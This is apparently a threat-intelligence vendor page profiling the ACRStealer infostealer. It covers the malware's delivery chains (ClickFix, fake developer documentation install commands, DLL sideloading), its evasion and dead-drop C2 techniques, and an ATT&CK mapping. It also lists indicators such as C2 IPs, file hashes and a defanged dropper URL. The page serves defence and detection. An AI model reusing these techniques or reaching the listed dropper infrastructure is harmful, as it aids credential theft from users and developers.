ACRStealer
ACRStealer is an information-stealing malware family, also referred to in the content as Arechclient2 and in later reporting as rebranded to AmateraStealer. It is described as an active credential-theft operation and MaaS offering that steals browser credentials, passwords, cookies, credit card data, cryptocurrency wallet data, authentication tokens, API keys, cloud development credentials, password manager data, email and chat application data, FTP/VPN/remote access data, documents, and other application secrets; some reporting states coverage of more than 200 applications. The malware has been observed harvesting Steam logins and appears in some campaigns to target gamers specifically.
The family is associated with multiple delivery mechanisms and ecosystems. Reported infection vectors include SEO-poisoned crack/keygen lures, compromised and legitimate websites, fake documentation pages for developer tools, ClickFix/FakeCaptcha social engineering, PowerShell droppers, DLL sideloading, MSI installers, ISO/ZIP archives, HTA droppers, HijackLoader, OffLoader, IDATLoader/HIjackLoader, RenPyLoader, AsgardProtector, and ShadowLadder-related delivery. In one developer-focused campaign, fake Claude Code and other documentation pages embedded hidden separators in copied install commands to execute malware while the legitimate installation still succeeded. In ClearFake activity, compromised websites and fake CAPTCHA/ClickFix flows delivered ACRStealer alongside SectopRAT. A Booking.com-themed ClickFix campaign delivered a likely ACRStealer/Efimer-related NativeAOT DLL via MSYS2 sideloading.
The malware shows substantial technical evolution and evasion. Content describes PowerShell-based droppers, XOR-encrypted loaders, Go-based and .NET-based components, dead-drop resolver techniques using Steam Community profiles, Google user profiles, Google Docs/Slides/Forms, Telegram Telegraph pages, and hardcoded public DNS resolvers to bypass enterprise DNS. Newer variants reportedly shifted C2 encryption from hardcoded-key AES to ECDH using SECP256R1 with ChaCha20-Poly1305 and an X-Requests-Key session header. Other observed techniques include AMSI bypasses, sandbox delays, fileless or in-memory execution, reflective loading, shellcode decryption with AES-256-CBC, Heaven's Gate WoW64 transitions, custom AFD socket operations, DLL sideloading under names such as wke.dll, python311.dll, python312.dll, python315.dll, CrashRpt1403.dll, and verification.google, and abuse of stolen EV code-signing certificates.
Several reports tie ACRStealer to SectopRAT and broader shared infrastructure. One report states SectopRAT is the .NET variant of the Arechclient2 family and assesses shared infrastructure as evidence of a single operator running both the Go-based ACRStealer and .NET-based SectopRAT. The malware has also been linked in reporting to AmateraStealer, NetSupport RAT, Vidar, LummaC2, Rhadamanthys, DeerStealer, PeakLight, and HijackLoader distribution chains.
High-confidence infrastructure and IOC details mentioned in the content include active C2 IPs such as 45.150.34.0, 46.149.72.66, 46.149.72.226, 77.91.96.209, 91.84.123.250, 94.26.106.216, 116.203.167.195, 193.33.195.37, and 212.118.41.180 in one March 2026 report; another campaign mapped ACRStealer C2s at 91.214.78.85, 89.167.47.162, 212.118.41.7, 45.150.34.229, 46.149.74.97, 77.91.96.203, and 212.118.41.180; and another identified 17 C2 IPs hosted by VDSINA, including 144.124.246.132, 144.124.233.47, 212.118.41.180, 146.103.104.188, and 45.150.34.0. A Telegraph dead-drop page titled "Jewel" contained the base64 string NDUuOS4xMjIuMTI1, resolving to 45.9.122.125 for exfiltration. Additional reported artifacts include a Go loader named continental with SHA-256 c2475b4b179267d3dd7f9c54d9e9f39b21109baa2c5d7e5acdc5e49d11bb1e95, an EV-signed binary sunwukongs.exe with SHA-256 430b69b2268bb1f2f0821c8cf65d648917e1d13fd5c6f945b5830534e1d0e559, a trojanized Chris-PC RAM Booster installer with SHA-256 e49fbf6640e8c5e9d47731ac1ddc2b7e6711df3b22e851220ec2f6a5ce8d6ecb, CoreHubManager.exe with SHA-256 e56b327e9a139e1327c266d010d6df2d77fd822d8c6fb7fdec25aab38ed864e8, and sideloading payloads such as wke.dll with SHA-256 c4627fbcce87136d2ec6fdb876b8c4496d7f25411d2c24860ba1ec0f8f39e916.
The content consistently characterizes ACRStealer as a widely distributed Windows infostealer active through late 2025 and 2026, with sophisticated encryption, anti-analysis, and multi-stage delivery tradecraft, and with campaigns targeting both broad consumer victims and developer-focused environments.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
36 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
4 techniques
Resource Development
Experts found over 88 fake domains mimicking Claude Code and other developer sites. The campaign utilises SEO infection and Google ads to deploy malicious install web pages over genuine documentation.
MITRE ATT&CK Mapping Tactic Technique ID Notes Resource Development Acquire Infrastructure: Domains T1583.001 casyetnx[.]pw via CNOBIN, hosting via dataforest/VDSINA
Initial Access
2 techniques
Initial Access
ClearFake spreads by compromising legitimate websites and injecting hidden JavaScript code into their pages. Victims do not need to do anything suspicious to get infected. Simply visiting a tampered legitimate site can trigger the malware’s multi-stage delivery chain.
Execution
9 techniques
Execution
You copy a command. You paste it in your terminal. By then, it’s already too late.
Stage 1 -- ACRStealer Dropper : A PowerShell script hosted at hxxps://casyetnx[.]pw/eq8e1l4b0qjd22w
Stage 3 -- Legitimate Python Binary : The ZIP extracts to a directory containing FNPLicensingService.exe -- which is actually a renamed, legitimately signed CPython 3.15 pythonw.exe... Stage 4 -- Obfuscated Python Loader : chrome_100_percent.pak ... is an ASCII text file containing obfuscated Python code.
Experts found various delivery techniques, such as rundll32.exe loading infected DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts.
Windows users were instructed to open the Run dialog and paste it, loading a remote DLL into memory with no file ever written to disk.
Windows users were instructed to open the Run dialog and paste it, loading a remote DLL into memory with no file ever written to disk.
The delivery diversity is striking: DLL Sideloading ... ZIPs containing a legitimate executable alongside a malicious DLL ... ISO Images ... MSI Installers ... HTA Droppers
The attacker directly tampered with and injected malicious code into a specific Python script (.py) inside the legitimate Python library folder (Lib). They then packaged this modified script together with a legitimate Python executable into a compressed archive and distributed it.
Stealth
8 techniques
Stealth
Experts found various delivery techniques, such as rundll32.exe loading infected DLLs, Base64-encoded commands... After execution, the malware uses a multi-level malicious chain that features encoded C2 communications...
After execution, the malware uses a multi-level malicious chain that features encoded C2 communications, anti-analysis capabilities, fileless execution tactics, and credential theft functions.
Experts found various delivery techniques, such as rundll32.exe loading infected DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts.
Experts found various delivery techniques, such as rundll32.exe loading infected DLLs...
After execution, the malware uses a multi-level malicious chain that features encoded C2 communications, anti-analysis capabilities...
Victims on Windows and macOS were routed to separate payloads tailored to their operating system, with routing handled by real-time OS detection in the browser.
The attacker directly tampered with and injected malicious code into a specific Python script (.py) inside the legitimate Python library folder (Lib). They then packaged this modified script together with a legitimate Python executable into a compressed archive and distributed it.
Credential Access
4 techniques
Credential Access
Victims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
Contrary to infostealers, the campaign pick on AI assets like authentication tokens, API Key, and cloud development credentials from tools such as Continue[.]dev, Cline.
Discovery
2 techniques
Discovery
Collection
5 techniques
Collection
MITRE ATT&CK Mapping ... Collection Data from Local System T1005 Document harvesting (DOC/TXT/PDF)
Victims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
ImageSharp Screenshot capture -- the stealer grabs what is on your screen
Clicking it triggered the ClickFix social engineering panel, which simultaneously injected a malicious command directly into the victim’s clipboard.
What It Steals ACRStealer targets a comprehensive list: Chrome, Firefox, Edge, Opera, Brave, and Vivaldi browser data (logins, cookies, history, autofill, credit cards); crypto wallets ... FTP clients ... email ... VPN configs ... password managers ... and chat apps
Command and Control
6 techniques
Command and Control
Threat actors used a technique called EtherHiding to store payload routing instructions inside blockchain smart contracts, bypassing all URL-based blocking methods entirely.
Dead Drop Resolver: Hiding C2 in Plain Sight ... The attacker creates profiles on Steam Community, Google Docs, Google Slides, or Telegram ... The malware fetches the page ... and decodes the Base64 to obtain the real C2 address
IOCs tracked for this family
142 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Information-stealing malware used as the primary payload in the campaign. It targets credentials, authentication tokens, API keys, and cloud development credentials, and is described as using sophisticated encryption, anti-analysis, encoded C2 communications, fileless execution, and evasion tactics.
A C++ information stealer used in the ClearFake campaign to harvest passwords, payment card data, cookies, and cryptocurrency wallet information.
An information-stealing malware family that uses dead drop resolver infrastructure via Telegraph to obtain its C2, then exfiltrates stolen data over HTTPS POST. It steals browser credentials and data, crypto wallets, FTP and email client data, VPN configs, password manager data, chat app data, and terminal/remote access credentials.
ACRStealer is described as a NativeAOT-compiled .NET information stealer delivered via DLL sideloading with psl.exe. It steals credentials, cookies, browser data, crypto wallet data, and captures screenshots while communicating with C2 over HTTPS/TLS 1.3.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.